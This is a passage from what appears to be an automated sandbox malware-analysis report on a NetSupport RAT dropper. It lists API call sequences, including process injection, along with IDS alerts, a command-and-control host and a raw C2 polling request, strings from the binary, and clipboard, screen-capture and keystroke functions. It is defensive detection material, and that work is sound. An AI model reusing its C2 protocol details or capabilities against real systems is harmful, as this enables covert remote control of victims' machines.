Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_1110AFD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49704 -> 45.76.253.210:443

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown	TCP traffic detected without corresponding DNS query: 45.76.253.210
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:53 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f721366e97243c3-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nwl0fqpWj9aOs%2B5pPibZUS%2BNlzyyJl7qpE06vFDlziailyOKQLpU2dv5%2BYP2DQjlQ3RQa3dwBfFRWca3zhnIWLKoxmtnNejFhWWn%2Bg8BTapNO5piyQUp14xnyYqc0uXQmOE6fv%2BVSNw7Jct"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:55 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f72136feae17d24-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nXncoeYjwhQke4Ub5QxCvwIOAE79H1YfjGNsnzfxAFE5xSi7t1sixwZM1paGZ1tFBWnIcxivtqRzQBYBELq2GRwcUp%2BurUxYqeRbV0Ft3nu3dUtSF9Rw1N4tI9bMh1LNi5HPvD9eQKu9HxJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2081&rtt_var=1040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:56 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f721378cfad7295-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZuyri2NnFtYmfqTdNlP6gWjMRy%2B7Q%2FarxYesHy1LblTvdkZkY0sUstwcZC9GaC1ryEeizxLVy81a8Z406fWBHmbgmxS2rn0TzLSzip2DxQA0XzVOkmfRg6R8A6cSwJUAVTTI3xQVbaEyWks"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Source: bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspV
Source: bild.exe, 00000006.00000002.3898386960.00000000010AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp_
Source: bild.exe, 00000006.00000002.3898386960.00000000010C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspo
Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp~
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: remcmdstub.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

6_2_1101F6B0

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F6B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	6_2_11032EE0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	7_2_1101F6B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	7_2_11032EE0

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

6_2_110321E0

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

6_2_110076F0

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11113880
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		7_2_11113880

Source: Yara match	File source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_111158B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		7_2_111158B0

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

